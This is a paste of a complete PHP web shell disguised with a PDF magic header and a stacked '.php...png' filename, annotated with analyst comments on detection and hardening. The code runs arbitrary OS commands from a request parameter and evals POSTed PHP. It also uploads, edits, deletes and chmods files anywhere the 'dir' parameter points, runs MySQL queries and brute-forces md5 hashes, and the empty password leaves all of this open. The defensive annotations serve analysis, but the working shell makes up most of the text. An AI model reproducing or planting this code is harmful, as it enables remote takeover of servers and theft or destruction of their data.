PalmaSolutions

aa.php.php.php1.php5.png

Mar 30th, 2018
  1. %PDF-1.6
  2. %ту╧╙
  3. <?php
     // Analyst note: this paste is a PHP web shell (file manager plus OS command and PHP
     // code execution, all driven by request parameters). The two lines before the opening
     // tag are a "%PDF-1.6" magic string and a few high bytes; PHP emits them as literal
     // output. Together with the stacked extensions in the paste title
     // (aa.php.php.php1.php5.png) this looks like a disguise aimed at upload checks that
     // trust magic bytes or a single extension - inferred, the delivery path is not shown.
     // Static strings visible in this paste that can feed content signatures: the cookie
     // name below, the " ~ chmod.php" title suffix and the footer credit line.
     // '@' silences the warning when config.php does not exist.
  4. @include"config.php";
  5. error_reporting(0); //Sets the reporting level to 0, so PHP errors from this script are not reported (the original comment claimed the opposite).
  6. $password = ""; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
     // Analyst note: the password is empty as pasted, and it is assigned after the include,
     // so a value set in config.php would be overwritten here.
  7. $me = basename(__FILE__);
  8. $cookiename = "wieeeee"; //Fixed cookie name; a hunting string wherever request cookies are logged.
  9.  
  10. if(isset($_POST['pass'])) //A login attempt is any POST that carries "pass".
  11. {
  12.  if(strlen($password) == 32) //A 32-character configured password is treated as an md5 hex digest.
  13.  {
  14.   $_POST['pass'] = md5($_POST['pass']);
  15.  }
  16.  if($_POST['pass'] == $password)
  17.  {
         // The cookie value is the submitted password itself (or its md5), valid for one hour.
  18.    setcookie($cookiename, $_POST['pass'], time()+3600); //Match: issue the session cookie.
  19.  }
  20.  reload();
  21. }
  22.  
      // Analyst note: '&&' binds tighter than 'or', so this reads
      //   (password configured AND no cookie) OR (cookie != password).
      // With the empty $password above and no cookie sent, both halves are false under loose
      // comparison (null != "" is false), so login() is skipped. Risk: a host carrying this
      // file unchanged exposes everything below to any visitor, so treat it as reachable by
      // third parties and not only by whoever placed it.
  23. if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
  24. {
  25.  login();
  26.  die();
  27. }
  28. //
  29. //Do not cross this line! All code placed after this block can't be executed without being logged in!
  30. //
  31. if(isset($_GET['p']) && $_GET['p'] == "logout")
  32. {
      // Logout: expire the cookie by setting it empty with a timestamp in the past, then redirect.
  33. setcookie ($cookiename, "", time() - 3600);
  34. reload();
  35. }
  36. if(isset($_GET['dir']))
  37. {
      // Analyst note: the working directory is taken straight from the "dir" query parameter
      // with no validation. Later code in this file works on '.' (opendir('.'), realpath('.')),
      // so this parameter decides which directory gets listed and written to. Requests to one
      // script with a "dir" parameter holding absolute filesystem paths are a useful
      // access-log pattern when hunting for this panel.
  38.  chdir($_GET['dir']);
  39. }
  40.  
  41. $pages = array(
  42.  'cmd' => 'Execute Command',
  43.  'eval' => 'Evaluate PHP',
  44.  'mysql' => 'MySQL Query',
  45.  'chmod' => 'Chmod File',
  46.  'phpinfo' => 'PHPinfo',
  47.  'md5' => 'md5 cracker',
  48.  'headers' => 'Show headers',
  49.  'logout' => 'Log out'
  50. );
  51. //The header, like it?
  52. $header = '<html>
  53. <title>'.getenv("HTTP_HOST").' ~ chmod.php</title>
  54. <head>
  55. <style>
  56. td {
  57. font-size: 12px;
  58. font-family: verdana;
  59. color: #33FF00;
  60. background: #000000;
  61. }
  62. #d {
  63. background: #003000;
  64. }
  65. #f {
  66. background: #003300;
  67. }
  68. #s {
  69. background: #006300;
  70. }
  71. #d:hover
  72. {
  73. background: #003300;
  74. }
  75. #f:hover
  76. {
  77. background: #003000;
  78. }
  79. pre {
  80. font-size: 10px;
  81. font-family: verdana;
  82. color: #33FF00;
  83. }
  84. a:hover {
  85. text-decoration: none;
  86. }
  87.  
  88. input,textarea,select {
  89. border-top-width: 1px;
  90. font-weight: bold;
  91. border-left-width: 1px;
  92. font-size: 10px;
  93. border-left-color: #33FF00;
  94. background: #000000;
  95. border-bottom-width: 1px;
  96. border-bottom-color: #33FF00;
  97. color: #33FF00;
  98. border-top-color: #33FF00;
  99. font-family: verdana;
  100. border-right-width: 1px;
  101. border-right-color: #33FF00;
  102. }
  103. hr {
  104. color: #33FF00;
  105. background-color: #33FF00;
  106. height: 5px;
  107. }
  108. </style>
  109. </head>
  110. <body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
  111. <table width=100%><td id="header" width=100%>
  112. <p align=right><b>[<a href="#">root</a>]  [<a href="'.$me.'">Home</a>] ';
  113. foreach($pages as $page => $page_name)
  114. {
  115.  $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
  116. }
  117. $header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
  118. print $header;
  119. $footer = '<tr><td><hr><center>&copy; <a href="#">LoocK3D</a> & <a href="#">locked.ks@gmail.com</a></center></td></table></body></head></html>';
  120.  
  121. //
  122. //Page handling
  123. //
  124. if(isset($_REQUEST['p']))
  125. {
  126.   switch ($_REQUEST['p']) {
  127.    
  128.    case 'cmd': //Run command
  129.    
         // Analyst note: OS command execution. The "command" value is read from $_REQUEST and
         // handed unchanged to execute_command(), with the function chosen by
         // get_execution_method(). Defensive angles: the web-server account spawning shell or
         // utility processes is the runtime signal; "p=cmd" with a "command" parameter is the
         // request-side signal (query strings only - POST bodies are usually not in access logs).
  130.     print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
  131.      if(isset($_REQUEST['command']))
  132.      {
  133.       print "<pre>";
  134.       execute_command(get_execution_method(),$_REQUEST['command']); //Request parameter goes to the OS command function as-is.
  135.      }
  136.    break;
  137.    
  138.    
  139.    case 'edit': //Edit a fie
  140.     if(isset($_POST['editform']))
  141.     {
  142.      $f = $_GET['file'];
  143.      $fh = fopen($f, 'w') or print "Error while opening file!";
  144.      fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
  145.      fclose($fh);
  146.     }
  147.     print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
  148.    
  149.     if(file_exists($_GET['file']))
  150.     {
  151.      $rd = file($_GET['file']);
  152.      foreach($rd as $l)
  153.      {
  154.       print htmlspecialchars($l);
  155.      }
  156.     }
  157.    
  158.     print "</textarea><input type=submit value=\"Save\"></form>";
  159.    
  160.    break;
  161.    
  162.    case 'delete': //Delete a file
  163.    
  164.     if(isset($_POST['yes']))
  165.     {
  166.      if(unlink($_GET['file']))
  167.      {
  168.       print "File deleted successfully.";
  169.      }
  170.      else
  171.      {
  172.       print "Couldn't delete file.";
  173.      }
  174.     }
  175.    
  176.    
  177.     if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
  178.     {
  179.      print "Are you sure you want to delete ".$_GET['file']."?<br>
  180.     <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
  181.     <input type=hidden name=yes value=yes>
  182.     <input type=submit value=\"Delete\">
  183.     ";
  184.     }
  185.    
  186.    
  187.    break;
  188.    
  189.    
  190.    case 'eval': //Evaluate PHP code
  191.    
         // Analyst note: renders a textarea (pre-filled with the previous submission, HTML-escaped)
         // and, further down, runs the submitted text as PHP.
  192.     print "<form action=\"".$me."?p=eval\" method=POST>
  193.    <textarea cols=60 rows=10 name=\"eval\">";
  194.     if(isset($_POST['eval']))
  195.     {
  196.      print htmlspecialchars($_POST['eval']);
  197.     }
  198.     else
  199.     {
  200.      print "print \"Yo Momma\";";
  201.     }
  202.     print "</textarea><br>
  203.    <input type=submit value=\"Eval\">
  204.    </form>";
  205.    
  206.     if(isset($_POST['eval']))
  207.     {
  208.      print "<h1>Output:</h1>";
  209.      print "<br>";
          // Analyst note: arbitrary PHP from the POST body runs in the web-server process.
          // eval is a language construct, so the php.ini disable_functions list does not
          // remove it; file-integrity monitoring of the web root and static scanning for
          // eval() applied to request superglobals are the relevant controls.
  210.      eval($_POST['eval']);
  211.     }
  212.    
  213.    break;
  214.    
  215.    case 'chmod': //Chmod file
  216.    
  217.    
  218.     print "<h1>Under construction!</h1>";
  219.     if(isset($_POST['chmod']))
  220.     {
  221.     switch ($_POST['chvalue']){
  222.      case 777:
  223.      chmod($_POST['chmod'],0777);
  224.      break;
  225.      case 644:
  226.      chmod($_POST['chmod'],0644);
  227.      break;
  228.      case 755:
  229.      chmod($_POST['chmod'],0755);
  230.      break;
  231.     }
  232.     print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
  233.     }
  234.     if(isset($_GET['file']))
  235.     {
  236.      $content = urldecode($_GET['file']);
  237.     }
  238.     else
  239.     {
  240.      $content = "file/path/please";
  241.     }
  242.    
  243.     print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
  244.    <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
  245.    <select name=\"chvalue\">
  246. <option value=\"777\">777</option>
  247. <option value=\"644\">644</option>
  248. <option value=\"755\">755</option>
  249. </select><input type=submit value=\"Change\">";
  250.    
  251.    break;
  252.    
  253.    case 'mysql': //MySQL Query
  254.    
  255.    if(isset($_POST['host']))
  256.    {
  257.     $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
  258.     mysql_select_db($_POST['dbase']);
  259.     $sql = $_POST['query'];
  260.    
  261.    
  262.     $result = mysql_query($sql);
  263.    
  264.    }
  265.    else
  266.    {
  267.     print "
  268.    This only queries the database, doesn't return data!<br>
  269.    <form action=\"".$me."?p=mysql\" method=POST>
  270.    <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
  271.    <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
  272.    <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
  273.    <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
  274.    
  275.    <b>Query:<br></b<textarea name=query></textarea>
  276.    <input type=submit value=\"Query database\">
  277.    </form>
  278.    ";
  279.    
  280.    }
  281.    
  282.    break;
  283.    
  284.    case 'createdir':
  285.    if(mkdir($_GET['crdir']))
  286.    {
  287.    print 'Directory created successfully.';
  288.    }
  289.    else
  290.    {
  291.    print 'Couldn\'t create directory';
  292.    }
  293.    break;
  294.    
  295.    
  296.    case 'phpinfo': //PHP Info
  297.     phpinfo();
  298.    break;
  299.    
  300.    
  301.    case 'rename':
  302.    
  303.     if(isset($_POST['fileold']))
  304.     {
  305.      if(rename($_POST['fileold'],$_POST['filenew']))
  306.      {
  307.       print "File renamed.";
  308.      }
  309.      else
  310.      {
  311.       print "Couldn't rename file.";
  312.      }
  313.      
  314.     }
  315.     if(isset($_GET['file']))
  316.     {
  317.      $file = basename(htmlspecialchars($_GET['file']));
  318.     }
  319.     else
  320.     {
  321.      $file = "";
  322.     }
  323.    
  324.     print "Renaming ".$file." in folder ".realpath('.').".<br>
  325.        <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
  326.     <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
  327.     <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
  328.     <input type=submit value=\"Rename file\">
  329.     </form>";
  330.    break;
  331.    
  332.    case 'md5':
  333.    if(isset($_POST['md5']))
  334.    {
  335.    if(!is_numeric($_POST['timelimit']))
  336.    {
  337.    $_POST['timelimit'] = 30;
  338.    }
  339.    set_time_limit($_POST['timelimit']);
  340.     if(strlen($_POST['md5']) == 32)
  341.     {
  342.      
  343.       if($_POST['chars'] == "9999")
  344.       {
  345.       $i = 0;
  346.       while($_POST['md5'] != md5($i) && $i != 100000)
  347.        {
  348.         $i++;
  349.        }
  350.       }
  351.       else
  352.       {
  353.        for($i = "a"; $i != "zzzzz"; $i++)
  354.        {
  355.         if(md5($i == $_POST['md5']))
  356.         {
  357.          break;
  358.         }
  359.        }
  360.       }
  361.      
  362.      if(md5($i) == $_POST['md5'])
  363.      {
  364.        print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
  365.      }
  366.      
  367.     }
  368.    
  369.    }
  370.    
  371.    print "Will bruteforce the md5
  372.    <form action=\"".$me."?p=md5\" method=POST>
  373.    <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
  374.    <b>Characters:</b><br><select name=\"chars\">
  375.    <option value=\"az\">a - zzzzz</option>
  376.    <option value=\"9999\">1 - 9999999</option>
  377.    </select>
  378.    <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
  379.    <input type=submit value=\"Bruteforce md5\">
  380.    </form><br>*: if set_time_limit is allowed by php.ini";
  381.    break;
  382.    
  383.    case 'headers':
  384.    foreach(getallheaders() as $header => $value)
  385.    {
  386.    print htmlspecialchars($header . ":" . $value)."<br>";
  387.    
  388.    }
  389.    break;
  390.   }
  391. }
  392. else //Default page that will be shown when the page isn't found or no page is selected.
  393. {
  394.  
  395.  $files = array();
  396.  $directories = array();
  397.  
  398.  if(isset($_FILES['uploadedfile']['name']))
  399. {
       // Analyst note: file upload handler. The destination is the current working directory
       // (which the "dir" parameter handled earlier in this file can change) plus the
       // client-supplied file name reduced with basename(). There is no check on extension,
       // type or size here, and the name is echoed back without HTML escaping.
       // Detection angle: new files owned by the web-server account appearing in web-served
       // directories shortly after multipart POSTs to this script.
  400.  $target_path = realpath('.').'/';
  401.  $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
  402.  if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
  403.      print "File:".  basename( $_FILES['uploadedfile']['name']).
  404.      " has been uploaded";
  405.  } else{
  406.      echo "File upload failed!";
  407.  }
  408. }
  409.  
  410.  
  411.  
  412.  
  413.  print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
  414.  if ($handle = opendir('.'))
  415.  {
  416.   while (false !== ($file = readdir($handle)))
  417.   {
  418.         if(is_dir($file))
  419.      {
  420.     $directories[] = $file;
  421.      }
  422.      else
  423.      {
  424.     $files[] = $file;
  425.      }
  426.   }
  427.  asort($directories);
  428.  asort($files);
  429.   foreach($directories as $file)
  430.   {
  431.    print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  432.   }
  433.  
  434.   foreach($files as $file)
  435.   {
  436.    print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  437.   }
  438.  }
  439.  else
  440.  {
  441.   print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
  442.  }
  443.  
  444.  print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
  445. <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
  446. <input type=\"submit\" value=\"Upload File\" />
  447. </form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
  448. <tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
  449. </td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
  450. </table>";
  451.  
  452. }
  453.  
  454. function login()
  455. {
  456.  print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
  457. <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>
  458. <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
  459. </form>";
  460. }
  461. function reload()
  462. {
  463.  header("Location: ".basename(__FILE__));
  464. }
  465. function get_execution_method()
  466. {
        // Probes which OS command-execution functions exist in this PHP build and returns a
        // label string for one of them. The four checks are independent ifs, so a later match
        // overwrites an earlier one; "Disabled" is returned when none exists.
        // Analyst note: the functions probed here (passthru, exec, shell_exec, system) are the
        // ones to list in php.ini disable_functions on hosts that have no need for them.
  467.  if(function_exists('passthru')){ $m = "passthru"; }
  468.  if(function_exists('exec')){ $m = "exec"; }
  469.  if(function_exists('shell_exec')){ $m = "shell_ exec"; }
  470.  if(function_exists('system')){ $m = "system"; }
  471.  if(!isset($m)) //None of the four functions exists.
  472.  {
  473.   $m = "Disabled";
  474.  }
  475.  return($m);
  476. }
  477. function execute_command($method,$command)
  478. {
        // Runs $command through the PHP function named by $method and sends its output to the
        // response. $command is used exactly as received: no escaping, filtering or allow-list.
        // In this file the only caller passes $_REQUEST['command']. A $method that matches none
        // of the four labels below (for example "Disabled") executes nothing.
        // Analyst note: every branch makes the web-server process start a child process, which
        // is what process-lineage detections (web server -> shell/utility) key on.
  479.  if($method == "passthru")
  480.  {
  481.   passthru($command);
  482.  }
  483.  
  484.  elseif($method == "exec")
  485.  {
          // exec() collects output lines into $result; each is printed followed by <br>,
          // without HTML escaping.
  486.   exec($command,$result);
  487.   foreach($result as $output)
  488.   {
  489.    print $output."<br>";
  490.   }
  491.  }
  492.  
  493.  elseif($method == "shell_exec")
  494.  {
  495.   print shell_exec($command);
  496.  }
  497.  
  498.  elseif($method == "system")
  499.  {
  500.   system($command);
  501.  }
  502. }
  503. function perm($file)
  504. {
  505.  if(file_exists($file))
  506.  {
  507.   return substr(sprintf('%o', fileperms($file)), -4);
  508.  }
  509.  else
  510.  {
  511.   return "????";
  512.  }
  513. }
  514. function get_color($file)
  515. {
  516. if(is_writable($file)) { return "green";}
  517. if(!is_writable($file) && is_readable($file)) { return "white";}
  518. if(!is_writable($file) && !is_readable($file)) { return "red";}
  519.  
  520. }
  521. function show_dirs($where)
  522. {
        // Builds the clickable breadcrumb shown in the page header: one link per component of
        // realpath($where), each pointing back at this script with ?dir=<path up to that part>.
        // Returns the HTML wrapped in <h2>. Path components are placed into the markup without
        // HTML escaping.
        // Analyst note: ereg() was removed in PHP 7.0, which suggests the sample was written for
        // PHP 5 (the mysql_* calls elsewhere in this paste point the same way); the host's PHP
        // version is worth recording during triage.
  523.  if(ereg("^c:",realpath($where)))
  524.  {
        // Path starts with "c:" - split on backslashes.
  525.  $dirparts = explode('\\',realpath($where));
  526.  }
  527.  else
  528.  {
  529.  $dirparts = explode('/',realpath($where));
  530.  }
  531.  
  532.  
  533.  
  534.  $i = 0;
  535.  $total = "";
  536.  
  537.  foreach($dirparts as $part)
  538.  {
          // Rebuild the prefix made of the first $i components, joined with "/".
  539.   $p = 0;
  540.   $pre = "";
  541.   while($p != $i)
  542.   {
  543.    $pre .= $dirparts[$p]."/";
  544.    $p++;
  545.    
  546.   }
  547.   $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
  548.   $i++;
  549.  }
  550.  
  551.  return "<h2>".$total."</h2><br>";
  552. }
  553. print $footer;
  554. // Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
  555. exit();
  556. ?>